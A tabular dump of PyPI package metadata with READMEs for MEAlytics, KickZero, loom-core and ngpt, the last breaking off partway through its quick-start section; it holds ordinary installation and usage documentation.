metadata_version string | name string | version string | summary string | description string | description_content_type string | author string | author_email string | maintainer string | maintainer_email string | license string | keywords string | classifiers list | platform list | home_page string | download_url string | requires_python string | requires list | provides list | obsoletes list | requires_dist list | provides_dist list | obsoletes_dist list | requires_external list | project_urls list | uploaded_via string | upload_time timestamp[us] | filename string | size int64 | path string | python_version string | packagetype string | comment_text string | has_signature bool | md5_digest string | sha256_digest string | blake2_256_digest string | license_expression string | license_files list | recent_7d_downloads int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2.4 | MEAlytics | 0.1.0 | Python tool for processing MEA files. | #### Please not that this project is still in development.
# MEAlytics
MEAlytics is an open-source Python tool for processing Microelectrode Array (MEA) data.<br>
This repository is maintained by the Amsterdam University of Applied Sciences (AUAS).<br>
## [For more information on functionality and usage, please refer to the documentation](https://cureq.github.io/MEAlytics/)
## CureQ
This tool was created for the CureQ consortium.<br>
For more information about the CureQ project, visit https://cureq.nl/.
___
## Install the library
MEAlytics can be downloaded from the Python Package Index (PyPI) using PIP:
```shell
pip install MEAlytics
```
More elaborate installation instructions, inlcuding a 'plug-and-play' installer can be found in the [User Guide](https://cureq.github.io/MEAlytics/installation).<br>
---
## Library usage
MEAlytics' functions can be called from a regular Python script, this might be useful to automate processing large datasets. <br>
```python
from MEAlytics.mea import analyse_wells, get_default_parameters
fileadress='/path/to/your/experiment.h5'
sampling_rate=20000
electrode_amount=12
# Get and edit parameters
parameters = get_default_parameters()
parameters['use multiprocessing'] = True
if __name__ == '__main__':
analyse_wells(fileadress=fileadress,
sampling_rate=sampling_rate,
electrode_amnt=electrode_amount,
parameters=parameters
)
```
---
## MEA GUI
However, the main way that MEAlytics is meant to be used, is with the Graphical User Interface (GUI). <br>
The GUI can be used to initialize the analysis, but also contains other features such as interactive data visualization and plotting. <br>
### Opening the GUI
There are multiple ways to launch the GUI:
#### Opening from Python script
```python
from MEAlytics.GUI.mea_analysis_tool import MEA_GUI
if __name__=="__main__":
MEA_GUI()
```
#### Launching from command prompt
```shell
C:\Users>mealytics
```
or
```shell
C:\Users>python -m MEAlytics
```
#### Create shortcuts
This process can be simplified by creating shortcuts that in essence perform the same process. In the command prompt, enter “mealytics –create-shortcut”.
```shell
C:\Users>MEAlytics --create-shortcut
Desktop shortcut created at C:\Users\Desktop\MEAlytics.lnk
```
The output should look like this, and a shortcut should appear on your desktop and start menu.
#### From the installer
When you have installed MEAlytics using the Windows installer, you can open it the same as you would with any application, using the desktop or start menu.
---
## MEAlytics functionality
This section showcases the basic functionality of MEAlytics, for more information, refer to [the documentation.](https://cureq.github.io/MEAlytics/)
### Multiprocessing
MEAlytics optionally utilizes **multiprocessing** to significantly speed up the analysis when resources are available!

### Spike detection
After performing the analysis, the user can inspect the results using the GUI!<br>
The user can alter all parameters regarding spike, burst and network burst detection and immediately apply these changes to see how they alter the analysis. This allows you to quickly see the effect of parameter changes, without having to redo the entire analysis. <br>

Additonally, the user can zoom in on the data to view the smaller timeframes.

### Single channel burst detection
Burst detection is performed using the logISI method, meaning that the thresholds adapt to the input data!

### Network burst detection
Network burst detection is performed by looking for high activity bursting periods on multiple channels.

### Batch processing
Perform high-throughput analysis using the batch processing module!

### Features
MEAlytics calculates over 40 descriptive well and electrode features and saves them in a csv file. These can then be read by other applications such as excel.

### Group comparison
The resulting features of multiple experiments can be combined to compare the differences between two groups using the plotting module.

Compare two groups with each other and create visualisations for all features. Output is saved in pdf format.

Visualise the development of features over time by simply adding a prefix to your feature files.

### Parameters
Lastly, MEAlytics offers a wide range of parameters that can be used to alter the analysis! However, all parameters have default values that are backed by literature.

<!--
**CureQ/CureQ** is a ✨ _special_ ✨ repository because its `README.md` (this file) appears on your GitHub profile.
-->
| text/markdown | null | CureQ <cureq-ft@hva.nl> | null | null | GPL-3.0-or-later | MEA, Microelectrode Array, electrophysiology, neuroscience, analysis | [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)",
"Operating System :: OS Independent"
] | [] | null | null | >=3.8 | [] | [] | [] | [
"matplotlib>=3.7.3",
"numpy>=1.26.4",
"h5py>=3.9.0",
"pandas>=2.1.4",
"scipy>=1.11.4",
"seaborn>=0.12.2",
"statsmodels>=0.14.0",
"scikit-image>=0.22.0",
"KDEpy>=1.1.9",
"customtkinter>=5.2.2",
"CTkToolTip>=0.8",
"CTkMessagebox>=2.7",
"CTkColorPicker>=0.9.0",
"requests>=2.32.3",
"pyshortcuts>=1.9.5"
] | [] | [] | [] | [
"Homepage, https://github.com/CureQ/MEAlytics",
"Repository, https://github.com/CureQ/MEAlytics.git"
] | uv/0.8.14 | 2026-02-20T09:39:39.712656 | mealytics-0.1.0.tar.gz | 118,961 | 9f/81/4c553ea91f3c40b23823425ac6acb3aa5e6a29a87541f95841350ce1f219/mealytics-0.1.0.tar.gz | source | sdist | null | false | 0dc6fde69f552fa2cde49aa127b6984c | 3b8eb3981fc8d33e1836aa07ccad7d182a8ebccc534cbf7f0616d492d6b34eaa | 9f814c553ea91f3c40b23823425ac6acb3aa5e6a29a87541f95841350ce1f219 | null | [
"LICENSE"
] | 0 |
2.4 | KickZero | 1.3.0.0 | Kick.com için gelişmiş ve kolay kullanımlı bot framework'ü | # ⚔️ KickZero Framework
Kick.com platformu için geliştirilmiş, yüksek performanslı, asenkron ve **Context** tabanlı modern bir bot framework'ü.
## ✨ Öne Çıkan Özellikler
* 🚀 **Tamamen Asenkron:** `aiohttp` ve `websockets` tabanlı motoruyla takılmadan çalışır.
* 🧠 **Context Yapısı:** `ctx.reply()` ve `ctx.author` gibi kolaylıklarla kod yazımını hızlandırır.
* 🔍 **Gelişmiş Debug:** Mesaj gönderim hatalarını dosyadaki satır numarasına kadar raporlar.
* 🛡️ **Spam Koruması:** Botun kendi mesajlarına cevap vererek sonsuz döngüye girmesini engeller.
## 🛠️ Kurulum
Projenizi bilgisayarınıza çekin:
```bash
git clone [https://github.com/KULLANICI_ADIN/KickZero.git](https://github.com/KULLANICI_ADIN/KickZero.git)
cd KickZero
pip install -r requirements.txt
📖 Örnek Kullanım
import asyncio
from KickZero import KickBot
# Botu başlat
bot = KickBot(
user_name="BotAdınız",
app_key="KICK_APP_KEY",
chat_id="CHAT_ID",
bearer_token="BEARER_TOKEN"
)
@bot.command(name="ping")
async def ping_komutu(ctx, args):
await ctx.reply("Pong! Zoro asenkron nöbette! ⚔️")
@bot.on_message()
async def mesaj_takibi(ctx):
# Gelen her mesajı konsola yazdırır
print(f"💬 [{ctx.author}]: {ctx.content}")
if __name__ == "__main__":
asyncio.run(bot.start())
## 🤝 Katkıda Bulunma (Contributing)
Bu proje geliştirmeye açıktır ancak büyük değişiklikler veya yeni özellikler eklemek isterseniz lütfen önce bir **Issue** açın veya benimle iletişime geçin. İzin alınmadan yapılan büyük değişikliklerin ana projeye dahil edilmesi garanti edilmez.
| text/markdown | Seymen Sözen | null | null | null | null | null | [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"
] | [] | https://github.com/SeymenSozen/KickZero | null | >=3.8 | [] | [] | [] | [
"aiohttp",
"websockets",
"colorama"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.14.2 | 2026-02-20T09:39:33.591500 | kickzero-1.3.0.0.tar.gz | 13,958 | 0a/45/df1b64dd820625304c4e49ef2e3ab03e30b926be94dd013ace16999cd762/kickzero-1.3.0.0.tar.gz | source | sdist | null | false | b2b5c2b622afef94de31f967e62c5ca0 | b4bebb70c68501c02e06e5efc2650d994e6d468092701f4eb4ba460492755862 | 0a45df1b64dd820625304c4e49ef2e3ab03e30b926be94dd013ace16999cd762 | null | [
"LICENSE"
] | 0 |
2.4 | loom-core | 1.22.0 | Durable workflow orchestration engine for Python | # Loom - Durable Workflow Orchestration
<p align="center">
<img src="https://raw.githubusercontent.com/satadeep3927/loom/refs/heads/main/docs/logo-white.png" alt="Loom Logo" width="200"/>
</p>
[](https://www.python.org/downloads/)
[](https://opensource.org/licenses/MIT)
[](https://pypi.org/project/loom-core/)
A Python-based durable workflow orchestration engine inspired by [Temporal](https://temporal.io/) and [Durable Task Framework](https://github.com/Azure/durabletask). Loom provides event-sourced, deterministic workflow execution with automatic recovery and replay capabilities.
## Features
- **Event Sourcing**: All workflow state changes persisted as immutable events
- **Deterministic Replay**: Workflows reconstruct from event history for recovery
- **Type Safe**: Full generic typing support with `Workflow[InputT, StateT]`
- **Async First**: Built on asyncio for high-performance concurrent execution
- **Durable Execution**: Workflows survive process crashes and auto-recover
- **Beautiful CLI**: Rich console interface with progress tracking
- **Well Tested**: Comprehensive test suite with pytest
## Quick Start
### Installation
```bash
pip install loom-core
```
Or install from source:
```bash
git clone https://github.com/satadeep3927/loom.git
cd loom
pip install -e .
```
### Define a Workflow
```python
import asyncio
from typing import TypedDict
import loom
# Define your data types
class OrderInput(TypedDict):
order_id: str
customer_email: str
class OrderState(TypedDict):
payment_confirmed: bool
email_sent: bool
# Define activities (side effects)
@loom.activity(name="process_payment", retry_count=3, timeout_seconds=30)
async def process_payment(order_id: str) -> bool:
# Call payment API
return True
@loom.activity(name="send_email", retry_count=2)
async def send_confirmation_email(email: str, order_id: str) -> None:
# Send email via service
pass
# Define workflow
@loom.workflow(name="OrderProcessing", version="1.0.0")
class OrderWorkflow(loom.Workflow[OrderInput, OrderState]):
@loom.step(name="process_payment")
async def payment_step(self, ctx: loom.WorkflowContext[OrderInput, OrderState]):
success = await ctx.activity(process_payment, ctx.input["order_id"])
await ctx.state.set("payment_confirmed", success)
ctx.logger.info(f"Payment processed: {success}")
@loom.step(name="send_confirmation")
async def notification_step(self, ctx: loom.WorkflowContext[OrderInput, OrderState]):
if ctx.state["payment_confirmed"]:
await ctx.activity(
send_confirmation_email,
ctx.input["customer_email"],
ctx.input["order_id"]
)
await ctx.state.set("email_sent", True)
ctx.logger.info("Confirmation email sent")
```
### Start a Workflow
The simplest way to start a workflow is using the class method:
```python
import asyncio
import loom
async def main():
# Start workflow using the class method (recommended)
handle = await OrderWorkflow.start(
OrderInput(
order_id="ORD-12345",
customer_email="customer@example.com",
)
)
print(f"Workflow started: {handle.workflow_id}")
# Wait for completion and get result (final state)
result = await handle.result()
print(f"Workflow completed with state: {result}")
if __name__ == "__main__":
asyncio.run(main())
```
### Run the Worker
```bash
# Initialize database
loom init
# Start worker with 4 concurrent task processors
loom worker
# Custom configuration
loom worker --workers 8 --poll-interval 1.0
```
### 🌐 Web Dashboard
Start the interactive web dashboard to monitor and manage workflows in real-time:
```bash
# Start web server on default port (8000)
loom web
# Custom host and port
loom web --host 0.0.0.0 --port 3000
# Development mode with auto-reload
loom web --reload
```
**Access the dashboard at `http://localhost:8000`** after starting the server.
The web dashboard provides:
- 📊 **Real-time workflow monitoring** with Server-Sent Events (SSE)
- 📈 **Workflow definition graphs** (similar to Airflow DAGs) showing workflow structure
- 📋 **Task queue visualization** and execution tracking
- 📜 **Event history** with comprehensive audit trails
- 📊 **Performance metrics** and system statistics
- 📚 **Interactive API documentation** at `/docs`
## 🎯 Complete Example
Here's a complete workflow example demonstrating all features:
```python
import random
from datetime import timedelta
import loom
from loom.core.context import WorkflowContext
from loom.core.workflow import Workflow
from loom.schemas.state import Input, State
class QuizInput(Input):
lesson_id: str
class QuizState(State):
quiz_id: str | None
wait_time: int | None
submissions: list | None
result: dict | None
@loom.activity(name="GenerateQuiz")
async def generate_quiz_activity() -> str:
quiz_id = f"Quiz-{random.randint(1000, 9999)}"
print(f"Generated Quiz: {quiz_id}")
return quiz_id
@loom.activity(name="SendQuizToLMS")
async def send_quiz_to_lms_activity(quiz_id: str) -> None:
print(f"Sent {quiz_id} to LMS")
@loom.activity(name="FetchWaitTime")
async def fetch_wait_time_activity() -> int:
return 120 # 2 minutes
@loom.activity(name="PullSubmissions")
async def pull_submissions_activity(quiz_id: str) -> list:
print(f"Pulled submissions for {quiz_id}")
return ["Submission 1", "Submission 2", "Submission 3"]
@loom.activity(name="AssessResult")
async def assess_result_activity(quiz_id: str) -> dict:
score = random.randint(50, 100)
return {"quiz_id": quiz_id, "score": score, "status": "Completed"}
@loom.activity(name="StoreResult")
async def store_result_activity(result: dict) -> None:
print(f"Stored Result: {result}")
@loom.workflow(
name="AssessmentWorkflow",
version="1.0.0",
description="A workflow for Quiz management."
)
class AssessmentWorkflow(Workflow[QuizInput, QuizState]):
@loom.step(name="generate_quiz")
async def generate_quiz(self, ctx: WorkflowContext[QuizInput, QuizState]):
ctx.logger.info("Generating Quiz...")
quiz_id = await ctx.activity(generate_quiz_activity)
await ctx.state.set("quiz_id", quiz_id)
@loom.step(name="send_to_lms")
async def send_to_lms(self, ctx: WorkflowContext[QuizInput, QuizState]):
quiz_id = ctx.state.get("quiz_id")
ctx.logger.info(f"Sending Quiz {quiz_id} to LMS...")
await ctx.activity(send_quiz_to_lms_activity, quiz_id)
@loom.step(name="fetch_wait_time")
async def fetch_wait_time(self, ctx: WorkflowContext[QuizInput, QuizState]):
ctx.logger.info("Fetching wait time...")
wait_time = await ctx.activity(fetch_wait_time_activity)
await ctx.state.set("wait_time", wait_time)
@loom.step(name="wait_step")
async def wait_step(self, ctx: WorkflowContext[QuizInput, QuizState]):
wait_time = ctx.state.get("wait_time")
ctx.logger.info(f"Waiting for {wait_time} seconds...")
await ctx.sleep(delta=timedelta(seconds=wait_time))
@loom.step(name="pull_submissions")
async def pull_submissions(self, ctx: WorkflowContext[QuizInput, QuizState]):
quiz_id = ctx.state.get("quiz_id")
submissions = await ctx.activity(pull_submissions_activity, quiz_id)
await ctx.state.set("submissions", submissions)
@loom.step(name="assess_result")
async def assess_result(self, ctx: WorkflowContext[QuizInput, QuizState]):
quiz_id = ctx.state.get("quiz_id")
result = await ctx.activity(assess_result_activity, quiz_id)
await ctx.state.set("result", result)
@loom.step(name="store_result")
async def store_result(self, ctx: WorkflowContext[QuizInput, QuizState]):
result = ctx.state.get("result")
await ctx.activity(store_result_activity, result)
ctx.logger.info("Workflow completed!")
# Start the workflow
async def main():
handle = await AssessmentWorkflow.start({"lesson_id": "lesson_123"})
result = await handle.status()
print(f"Workflow Status: {result}")
if __name__ == "__main__":
import asyncio
asyncio.run(main())
```
This example demonstrates:
- **Multiple steps** with sequential execution
- **Activity calls** for side effects
- **State management** across workflow execution
- **Timer/sleep** operations for waiting
- **Logging** with workflow context
- **Type safety** with generic workflow types
## 📚 Core Concepts
### State Management
Loom provides three ways to manage workflow state, all of which are durable and replay-safe:
#### 1. Single Key Updates (`set`)
Use `ctx.state.set()` for individual state changes. Each call emits a `STATE_SET` event:
```python
@loom.step()
async def process_order(self, ctx: loom.WorkflowContext[OrderInput, OrderState]):
# Set individual keys
await ctx.state.set("order_id", "ORD-123")
await ctx.state.set("status", "processing")
await ctx.state.set("timestamp", "2024-01-15T10:30:00")
# Read state
order_id = ctx.state["order_id"] # Dictionary access
status = ctx.state.get("status") # Safe get
items = ctx.state.get("items", []) # With default
```
#### 2. Batch Updates (`update`)
Use `ctx.state.update()` to replace the entire state atomically. Emits a single `STATE_UPDATE` event:
```python
@loom.step()
async def update_order_state(self, ctx: loom.WorkflowContext[OrderInput, OrderState]):
# Update entire state with a function that receives current state
await ctx.state.update(lambda state: {
**state, # Preserve existing keys
"order_id": "ORD-123",
"status": "shipped",
"shipped_at": "2024-01-15T14:00:00"
})
```
**Important**: The update function receives the current state and must return the complete new state.
#### 3. Batch Context Manager (`batch`)
Use `async with ctx.state.batch()` to collect multiple `set()` calls into a single `STATE_UPDATE` event:
```python
@loom.step()
async def batch_update(self, ctx: loom.WorkflowContext[OrderInput, OrderState]):
# Multiple updates batched into single STATE_UPDATE event
async with ctx.state.batch():
await ctx.state.set("order_id", "ORD-123")
await ctx.state.set("status", "processing")
await ctx.state.set("items", ["item1", "item2"])
await ctx.state.set("total", 99.99)
# Single STATE_UPDATE event emitted when context exits
```
**When to use each**:
- `set()`: Simple, single updates
- `update()`: Replace entire state based on current values
- `batch()`: Multiple related updates that should be atomic
### Workflow Handles
Workflow handles provide control and monitoring of running workflows:
```python
# Start workflow and get handle
handle = await OrderWorkflow.start({"order_id": "ORD-123"})
# Get workflow ID
print(f"Workflow ID: {handle.workflow_id}")
# Check status (returns "RUNNING", "COMPLETED", "FAILED", etc.)
status = await handle.status()
print(f"Status: {status}")
# Wait for completion and get final state
try:
result = await handle.result()
print(f"Completed with state: {result}")
except loom.WorkflowExecutionError as e:
print(f"Workflow failed: {e}")
except loom.ActivityFailedError as e:
print(f"Activity '{e.activity_name}' failed: {e.error_message}")
# Send signals to running workflow
await handle.signal("approve", {"approved_by": "admin", "timestamp": "2024-01-15"})
# Cancel workflow
await handle.cancel(reason="User requested cancellation")
```
### Exception Handling
⚠️ **CRITICAL**: Never catch `StopReplay` in your workflow code!
`StopReplay` is an internal control flow exception used by Loom to pause workflow replay when waiting for activities, timers, or signals. Catching it will break workflow execution and recovery.
```python
# ❌ WRONG - This will break workflow execution!
@loom.step()
async def bad_step(self, ctx):
try:
await ctx.activity(my_activity)
except Exception: # This catches StopReplay!
ctx.logger.error("Error occurred") # Workflow breaks here
pass
# ❌ ALSO WRONG
@loom.step()
async def another_bad_step(self, ctx):
try:
await ctx.activity(my_activity)
except: # Never use bare except
pass
# ✅ CORRECT - Catch specific exceptions only
@loom.step()
async def good_step(self, ctx):
try:
result = await ctx.activity(my_activity)
await ctx.state.set("result", result)
except loom.ActivityFailedError as e:
# Handle activity failure
ctx.logger.error(f"Activity failed: {e}")
await ctx.state.set("error", str(e))
# Workflow can continue or raise to fail
```
**Available Exceptions**:
Use these in your application code (not inside workflow steps):
```python
import loom
# Workflow execution
try:
handle = await MyWorkflow.start(input_data, state)
result = await handle.result()
except loom.WorkflowNotFoundError:
print("Workflow doesn't exist")
except loom.WorkflowStillRunningError:
print("Workflow hasn't completed yet")
except loom.WorkflowExecutionError:
print("Workflow failed during execution")
except loom.ActivityFailedError as e:
print(f"Activity '{e.activity_name}' failed: {e.error_message}")
except loom.NonDeterministicWorkflowError:
print("Workflow code changed in incompatible way")
```
**Why is StopReplay special?**
`StopReplay` is raised internally when the workflow execution reaches a point where it needs to wait for external events:
- An activity that hasn't completed yet
- A timer that hasn't fired
- A signal that hasn't been received
The engine catches this exception to save progress and pause execution. If your code catches it, the engine never receives it, and the workflow cannot properly pause and resume.
### Best Practices
#### ✅ Do:
- **Use activities for side effects**: All API calls, database writes, file I/O, etc.
```python
@loom.activity(name="send_email", retry_count=3)
async def send_email(to: str, subject: str) -> bool:
# API call, retry on failure
await email_service.send(to, subject)
return True
```
- **Make activities idempotent**: Safe to retry multiple times
```python
@loom.activity(name="create_order")
async def create_order(order_id: str) -> dict:
# Check if order exists first (idempotent)
existing = await db.get_order(order_id)
if existing:
return existing
return await db.create_order(order_id)
```
- **Use batch for related updates**: More efficient, single event
```python
async with ctx.state.batch():
await ctx.state.set("step", 3)
await ctx.state.set("progress", 75)
await ctx.state.set("updated_at", timestamp)
```
- **Use type hints**: Better IDE support and type checking
```python
class MyWorkflow(loom.Workflow[MyInput, MyState]):
@loom.step()
async def my_step(self, ctx: loom.WorkflowContext[MyInput, MyState]):
# ctx.input is MyInput, ctx.state is MyState
pass
```
- **Log with ctx.logger**: Respects replay mode, won't duplicate logs
```python
ctx.logger.info("Processing order") # Only logs during actual execution
ctx.logger.error("Failed to process") # Not during replay
```
- **Catch specific exceptions**: Only catch what you can handle
```python
try:
await ctx.activity(risky_activity)
except loom.ActivityFailedError:
# Handle specific failure
pass
```
#### ❌ Don't:
- **Don't use random in workflows**: Breaks determinism
```python
# ❌ WRONG
@loom.step()
async def bad_step(self, ctx):
value = random.randint(1, 100) # Different on replay!
await ctx.state.set("value", value)
# ✅ CORRECT - Use activity
@loom.activity(name="generate_random")
async def generate_random() -> int:
return random.randint(1, 100)
@loom.step()
async def good_step(self, ctx):
value = await ctx.activity(generate_random)
await ctx.state.set("value", value)
```
- **Don't use datetime.now() in workflows**: Non-deterministic
```python
# ❌ WRONG
@loom.step()
async def bad_step(self, ctx):
now = datetime.now() # Different on replay!
# ✅ CORRECT - Use activity
@loom.activity(name="get_timestamp")
async def get_timestamp() -> str:
return datetime.now().isoformat()
```
- **Don't perform I/O in workflows**: Use activities instead
```python
# ❌ WRONG
@loom.step()
async def bad_step(self, ctx):
data = await http_client.get("https://api.example.com") # Don't!
# ✅ CORRECT
@loom.activity(name="fetch_data")
async def fetch_data() -> dict:
return await http_client.get("https://api.example.com")
```
- **Don't catch Exception or bare except**: Catches StopReplay
```python
# ❌ WRONG
try:
await ctx.activity(my_activity)
except Exception: # Catches everything including StopReplay!
pass
# ✅ CORRECT
try:
await ctx.activity(my_activity)
except loom.ActivityFailedError: # Specific exception only
pass
```
- **Don't modify state without ctx.state**: Won't be persisted
```python
# ❌ WRONG
@loom.step()
async def bad_step(self, ctx):
my_state = {"value": 123}
# State not persisted!
# ✅ CORRECT
@loom.step()
async def good_step(self, ctx):
await ctx.state.set("value", 123) # Persisted
```
## CLI Commands
```bash
# Initialize database
loom init
# Start distributed worker
loom worker [--workers 4] [--poll-interval 0.5]
# List workflows
loom list [--limit 50] [--status RUNNING]
# Inspect workflow details
loom inspect <workflow-id> [--events]
# Show database statistics
loom stats
```
## 🏗️ Architecture
### Core Components

### Event Types
- `WORKFLOW_STARTED` - Workflow initialization
- `WORKFLOW_COMPLETED` - Successful completion
- `WORKFLOW_FAILED` - Fatal error occurred
- `STATE_SET` - Single state key updated
- `STATE_UPDATE` - Batch state update
- `ACTIVITY_SCHEDULED` - Activity queued for execution
- `ACTIVITY_COMPLETED` - Activity finished successfully
- `ACTIVITY_FAILED` - Activity permanently failed
- `TIMER_FIRED` - Sleep/delay completed
- `SIGNAL_RECEIVED` - External signal received
## Project Structure
```
loom/
├── src/
│ ├── common/ # Shared utilities
│ ├── core/ # Core engine (context, engine, runner, worker)
│ ├── database/ # Database layer
│ ├── decorators/ # @workflow, @step, @activity
│ ├── lib/ # Utilities and progress tracking
│ ├── migrations/ # Database migrations
│ └── schemas/ # Type definitions
├── tests/ # Test suite
├── examples/ # Example workflows
├── loom.py # Main package interface
└── pyproject.toml # Package configuration
```
## Configuration
Loom uses SQLite by default for simplicity. For production:
- Consider PostgreSQL/MySQL for scalability
- Implement connection pooling
- Add monitoring and alerting
- Deploy multiple workers for high availability
## Contributing
Contributions welcome! Please ensure:
1. Tests pass: `pytest`
2. Code formatted: `black .`
3. Type checking: `mypy .`
4. Linting: `ruff check .`
## 📝 License
MIT License - see LICENSE file for details
## 🙏 Acknowledgments
Inspired by:
- [Temporal](https://temporal.io/) - The workflow orchestration platform
- [Durable Task Framework](https://github.com/Azure/durabletask) - Microsoft's durable task library
- [Cadence](https://cadenceworkflow.io/) - Uber's workflow platform
[GitHub](https://github.com/satadeep3927/loom/issues)
## 📧 Contact
For questions and support, please open an issue on GitHub.
---
**Built with ❤️ using Python 3.12+**
| text/markdown | Satadeep Dasgupta | Satadeep Dasgupta <satadeep.dasgupta@brainiuminfotech.com> | null | null | MIT | workflow, orchestration, durable, event-sourcing, temporal | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"Topic :: Software Development :: Libraries :: Application Frameworks",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.12",
"Framework :: AsyncIO"
] | [] | https://github.com/satadeep3927/loom | null | >=3.12 | [] | [] | [] | [
"aiosqlite>=0.19.0",
"duckdb>=1.0.0",
"click>=8.0.0",
"rich>=14.3.1",
"fastapi[standard]>=0.95.0",
"uvicorn[standard]>=0.22.0",
"pydantic>=2.0.0",
"pytest>=7.0.0; extra == \"dev\"",
"pytest-asyncio>=0.21.0; extra == \"dev\"",
"pytest-cov>=4.0.0; extra == \"dev\"",
"mypy>=1.0.0; extra == \"dev\"",
"black>=23.0.0; extra == \"dev\"",
"isort>=5.12.0; extra == \"dev\"",
"ruff>=0.1.0; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/satadeep3927/loom",
"Documentation, https://github.com/satadeep3927/loom/blob/main/README.md",
"Repository, https://github.com/satadeep3927/loom",
"Issues, https://github.com/satadeep3927/loom/issues"
] | twine/6.2.0 CPython/3.13.9 | 2026-02-20T09:39:01.351504 | loom_core-1.22.0.tar.gz | 374,217 | 3f/69/e6a80279448b38384905e88fccdf1f2b259f3d7e7b6fe481dc4a5ec358d9/loom_core-1.22.0.tar.gz | source | sdist | null | false | 3a81472353c9e7ac81fa3cea46932ddb | 0ad26774cca614b9c2ed3b941d2f7cca30731a14dac9c02e84dd09b97adf4377 | 3f69e6a80279448b38384905e88fccdf1f2b259f3d7e7b6fe481dc4a5ec358d9 | null | [
"LICENSE"
] | 227 |
2.4 | ngpt | 6.8.0 | A lightning-fast AI-powered CLI toolkit for terminal productivity. Generate code, craft git commits, execute shell commands, and chat with any OpenAI-compatible LLM (OpenAI, Ollama, Groq, Claude, Gemini) directly from your terminal. | # nGPT
<p align="center">
<img src="https://raw.githubusercontent.com/nazdridoy/ngpt/main/.github/banner.svg" alt="nGPT Banner">
</p>
<p align="center">
<a href="https://pypi.org/project/ngpt/"><img src="https://img.shields.io/pypi/v/ngpt.svg" alt="PyPI version"></a>
<a href="https://aur.archlinux.org/packages/ngpt"><img alt="AUR Version" src="https://img.shields.io/aur/version/ngpt"></a>
<a href="https://opensource.org/licenses/MIT"><img src="https://img.shields.io/badge/License-MIT-yellow.svg" alt="License: MIT"></a>
<a href="https://nazdridoy.github.io/ngpt/"><img src="https://img.shields.io/badge/docs-available-brightgreen.svg" alt="Documentation"></a>
<a href="https://deepwiki.com/nazdridoy/ngpt"><img src="https://deepwiki.com/badge.svg" alt="Ask DeepWiki [DOCS]"></a>
</p>
<p align="center">
<a href="https://nazdridoy.github.io/ngpt/installation/#linuxmacos"><img src="https://img.shields.io/badge/Linux-support-blue?logo=linux" alt="Linux"></a>
<a href="https://nazdridoy.github.io/ngpt/installation/#windows"><img src="https://img.shields.io/badge/Windows-support-blue?logo=windows" alt="Windows"></a>
<a href="https://nazdridoy.github.io/ngpt/installation/#linuxmacos"><img src="https://img.shields.io/badge/macOS-support-blue?logo=apple" alt="macOS"></a>
<a href="https://nazdridoy.github.io/ngpt/installation/#android-termux"><img src="https://img.shields.io/badge/Android-Termux-blue?logo=android" alt="Android"></a>
</p>
🤖 **nGPT** - A lightning-fast CLI tool that brings any OpenAI-compatible LLM (OpenAI, Ollama, Groq, Claude, Gemini) directly to your terminal. Generate code, craft git commits, execute shell commands, rewrite text, and chat interactively, all with seamless provider switching and real-time streaming.

## Features
- ✅ **Versatile**: Powerful and easy-to-use CLI tool for various AI tasks
- 🪶 **Lightweight**: Minimal dependencies with everything you need included
- 🔄 **API Flexibility**: Works with OpenAI, Ollama, Groq, Claude, Gemini, and any OpenAI-compatible endpoint
- 💬 **Interactive Chat**: Continuous conversation with memory in modern UI
- 📊 **Streaming Responses**: Real-time output for better user experience
- 🔍 **Web Search**: Enhance any model with contextual information from the web, using advanced content extraction to identify the most relevant information from web pages
- 📥 **Stdin Processing**: Process piped content by using `{}` placeholder in prompts
- 🎨 **Markdown Rendering**: Beautiful formatting of markdown and code with syntax highlighting
- ⚡ **Real-time Markdown**: Stream responses with live updating syntax highlighting and formatting
- ⚙️ **Multiple Configurations**: Cross-platform config system supporting different profiles
- 💻 **Shell Command Generation**: OS-aware command execution
- 🧠 **Text Rewriting**: Improve text quality while maintaining original tone and meaning
- 🧩 **Clean Code Generation**: Output code without markdown or explanations
- 📝 **Rich Multiline Editor**: Interactive multiline text input with syntax highlighting and intuitive controls
- 📑 **Git Commit Messages**: AI-powered generation of conventional, detailed commit messages from git diffs
- 🎭 **System Prompts**: Customize model behavior with custom system prompts
- 🤖 **Custom Roles**: Create and use reusable AI roles for specialized tasks
- 📃 **Conversation Logging**: Save your conversations to text files for later reference
- 💾 **Session Management**: Save, load, and list interactive chat sessions with advanced session manager
- 🔌 **Modular Architecture**: Well-structured codebase with clean separation of concerns
- 🔄 **Provider Switching**: Easily switch between different LLM providers with a single parameter
- 🚀 **Performance Optimized**: Fast response times and minimal resource usage
See the [Feature Overview](https://nazdridoy.github.io/ngpt/overview/) for more details.
## Table of Contents
- [Features](#features)
- [Installation](#installation)
- [Quick Start](#quick-start)
- [Usage](#usage)
- [Command Line Options](#command-line-options)
- [Documentation](https://nazdridoy.github.io/ngpt/)
- [Documentation](#documentation)
- [Configuration](#configuration)
- [API Key Setup](#api-key-setup)
- [OpenAI API Key](#openai-api-key)
- [Google Gemini API Key](#google-gemini-api-key)
- [CLI Configuration](#cli-configuration)
- [Interactive Configuration](#interactive-configuration)
- [Configuration File](#configuration-file)
- [Configuration Priority](#configuration-priority)
- [Contributing](#contributing)
- [License](#license)
## Installation
```bash
# Installation with pip
pip install ngpt
# Or install with uv (faster installation)
uv pip install ngpt
# Or install globally as a CLI tool (recommended for command-line usage)
uv tool install ngpt
# Arch Linux: install from AUR
paru -S ngpt
```
Requires Python 3.8 or newer.
For detailed installation instructions, see the [Installation Guide](https://nazdridoy.github.io/ngpt/installation/).
## Quick Start
```bash
# Chat with default settings
ngpt "Tell me about quantum computing"
# Alternatively, run as a Python module
python -m ngpt "Tell me about quantum computing"
# Start an interactive chat session with conversation memory
ngpt -i
# Inside interactive mode, you can use commands like:
# /editor - Open multiline editor for complex inputs
# /exit - Exit the session (also 'exit', 'quit', 'bye' without '/')
# /help - Show help menu
# /reset - Reset the conversation
# /sessions - Manage saved sessions
# /transcript - Show recent conversation exchanges
# Keyboard shortcuts:
# Ctrl+E - Open multiline editor for complex inputs
# Ctrl+C - Exit the session
# ↑/↓ - Navigate command history
